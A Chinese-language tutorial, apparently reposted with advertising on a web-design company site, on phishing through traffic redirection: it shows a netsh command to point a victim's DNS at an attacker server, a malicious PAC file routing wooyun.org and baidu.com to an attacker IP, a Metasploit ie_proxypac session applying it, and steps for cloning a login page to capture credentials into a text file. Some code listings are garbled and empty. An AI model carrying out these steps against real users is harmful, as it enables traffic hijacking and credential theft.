通过.PAC(自动配置代理)文件进行网络钓鱼

0x00 常见网络钓鱼方式

创新互联专注为客户提供全方位的互联网综合服务,包含不限于网站建设、成都网站制作、应城网络推广、小程序制作、应城网络营销、应城企业策划、应城品牌公关、搜索引擎seo、人物专访、企业宣传片、企业代运营等,从售前售中售后,我们都将竭诚为您服务,您的肯定,是我们最大的嘉奖;创新互联为所有大学生创业者提供应城建站搭建服务,24小时服务热线:18980820575,官方网址:www.cdcxhl.com

攻击者进行网络钓鱼的方式常有以下几种:

1. 通过修改受害者hosts文件(C:\WINDOWS\system32\drivers\etc\hosts)来实现;

2. 通过修改受害者dns来实现;

3. 已经进入路由器,直接修改路由器的DNS。

罗列的并不全,之后遇到的话再补充,上述三种方式很常见。

修改HOSTS文件,即攻击者修改受害者HOSTS文件为如下形式:

127.0.0.1 localhost x.x.x.x www.wooyun.com

这样就受害者访问www.wooyun.com会直接访问到x.x.x.x。在msf中可以使用inject_host脚本来实现。

修改dns进行攻击:

攻击者可是使用如下命令修改受害者的dns地址(管理员身份执行):

C:\Windows\system32>netsh interface ip show interfaces    
Idx  Met   MTU   状态          名称
---  ---  -----  -----------  -------------------
  1   50 4294967295  connected    Loopback Pseudo-Interface 1
 10   10   1500  connected    本地连接    
C:\Windows\system32>netsh interface ip set dns "本地连接" static 192.168.1.100
C:\Windows\system32>ipconfig /all | findstr 192.168.1.100
   DNS 服务器  . . . . . . . . . . . : 192.168.1.100

这样就修改了受害者的DNS地址,之后可以使用msf的 fakedns来架设dns服务器来修改域名的解析地址。

除了直接修改路由器的DNS地址的以上两种方式在某些环境下还是有一些缺点的,例如,一些牛逼的AV会检测到文件的修改而发出报警,除此之外,如果受害者所处内网环境中的防火墙或路由器拦截对外部的DNS请求,修改受害者DNS的攻击方式并不能生效(因为攻击者架设的DNS在外网环境下)。

0x01 通过PAC代理

本文主要介绍的是Metasploit中的一个模块ie_proxypac。通过.PAC(自动配置代理)文件来完全控制IE的用户流量。只需要修改PAC文件,攻击者就能使受害者访问的某个域名指向攻击者的IP。虽然没有修改DNS但是可以达到同样的效果,且这种方式较为隐蔽。已经有很多人使用这种方式进行网络钓鱼。

下面是一个PAC文件示例:

function FindProxyForURL(url, host)
{
if (shExpMatch(host, "www.wooyun.org")) { 
 return "PROXY 192.168.52.129:80; DIRECT";
}
if (shExpMatch(host, "www.baidu.com")) { 
 return "PROXY 192.168.52.129:80; DIRECT";
}
}

这个文件的配置是当受害者访问www.wooyun.com以及www.baidu.com时,他会直接请求到攻击者ip( 192.168.52.129)。

详细的PAC编写请查看http://findproxyforurl.com/pac-functions/。

将以上脚本保存为test.pac,在获取meterpreter会话的基础上使用ie_proxypac脚本:

 
 
 
 
      
  
  
  
  1. meterpreter > background   
    2.   
  
  
  
  2. [*] Backgrounding session 1...  
    3.   
  
  
  
  3. msf > use post/windows/manage/ie_proxypac  
    4.   
  
  
  
  4. msf post(ie_proxypac) > set session 1  
    5.   
  
  
  
  5. session => 1  
    6.   
  
  
  
  6. msf post(ie_proxypac) > set REMOTE_PAC http://192.168.52.129/test.pac  
    7.   
  
  
  
  7. REMOTE_PAC => http://192.168.52.129/test.pac  
    8.   
  
  
  
  8. msf post(ie_proxypac) > show options       
    9.   
  
  
  
  9.    
    10.   
  
  
  
  10. Module options (post/windows/manage/ie_proxypac):      
    11.   
  
  
  
  11.    
    12.   
  
  
  
  12.    Name           Current Setting         Required  Description  
    13.   
  
  
  
  13.    ----           ---------------         --------  -----------  
    14.   
  
  
  
  14.    AUTO_DETECT    false                           yes       Automatically detect settings.  
    15.   
  
  
  
  15.    DISABLE_PROXY  false                           yes       Disable the proxy server.  
    16.   
  
  
  
  16.    LOCAL_PAC                                      no        Local PAC file.  
    17.   
  
  
  
  17.    REMOTE_PAC     http://192.168.52.129/test.pac  no        Remote PAC file. (Ex: http://192.168.1.20/proxy.pac)  
    18.   
  
  
  
  18.    SESSION        1                               yes       The session to run this module on.  
    19.   
  
  
  
  19. msf post(ie_proxypac) > exploit       
    20.   
  
  
  
  20.    
    21.   
  
  
  
  21. [*] Setting automatic configuration script from local PAC file ...  
    22.   
  
  
  
  22. [+] Automatic configuration script configured...  
    23.   
  
  
  
  23. [*] Post module execution completed     
    24.

之后打开ie,internet选项->连接->局域网设置:

可以看到pac已经使用pac文件进行了代理。

代理尽量使用远程代理,因为IE11默认禁止本地代理,如果使用本地代理,代理是无效的。详情测试发现,如果连接了vpn,pac代理是失效的。

现在再访问www.baidu.com,www.wooyun.org,会看到已经转移到了我们制定的ip:

0x02 能做什么

这里我们修改pac文件如下:

function FindProxyForURL(url, host)
{
if (shExpMatch(host, "www.wooyun.org")) { 
 return "PROXY 192.168.52.129:80; DIRECT";
}
}

这里ip要改成自己的web的ip,如果受害者请求的网站host为 www.wooyun.org 时,满足规则,然后跳转到我们指定的ip地址,这里我们可以来构造钓鱼。

打开wooyun,右键查看源代码,将所有源代码保存为index.html,放在网站根目录下,因为当受害者请求 http://wooyun.org,其host为 wooyun.org 不满足代理条件,就会直接请求,所以我们把源代码中的www.wooyun.org,改为wooyun.org:

然后找到url,src,href标签,修改为http://wooyun.org/xxxx 的形式,比如

 
 
 
 
      
  
  
  
  1.  
    2.

修改为

 
 
 
 
      
  
  
  
  1.  
    2.

改完以后,基本上就算克隆成功了:

下来要把登陆页面的的源码复制过来,打开http://www.wooyun.org/user.php?action=login,右键复制源码,保存为user.php,放在网站根目录下,修改源码中的url,src,href。修改完之后,打开index.html文件,定位登录,修改href为 user.php?action=login,修改以后此标签为:

 
 
 
 
      
  
  
  
  1. 登录 | 注册 
    2.

打开user.php,定位用户登录表单,修改表单action为post.php:

 
 
 
 
      
  
  
  
  1. 用户登录
 
  •         
    •  
  •     
  • ..... 

    • 在网站根目录新建post.php,添加如下代码:

     
 
 
 
        
  
  
  
    1.  
      2.

    这样钓鱼站就搭建好了。

    当用户登录时:

    点击登陆以后会跳转到http://wooyun.org/user.php?action=login

    查看data.txt:

    只是简单地一个示例,具体可以通过修改pac文件来实现控制浏览器是否进行代理。

    0x03 小结

    此种方式进行网络钓鱼,做的细致的话,很难被发现,而且隐蔽性好,缺点就是连接vpn以后代理将会失效。以上是个人的测试结果,请各位大牛指正。

    文章题目:通过.PAC(自动配置代理)文件进行网络钓鱼
    网站URL:http://www.csdahua.cn/qtweb/news36/502436.html

    网站建设、网络推广公司-快上网,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

    广告

    声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 快上网

    成都快上网为您推荐相关内容

    网站内链知识

    分类信息网

    成都高电机柜租用    雅安电信机房    成都网站排名    商标注册    成都小程序开发    gyruijie.cn    装饰公司网站建设方案    响应式报价    成都展柜厂    云服务器香港    内江服务器托管    重庆移动机房托管    郫县明安消防器材    成都网站建设    小程序开发    成都防护栏    眉山服务器托管    娄底尾呼妄服装    APP定制开发    绵竹做网站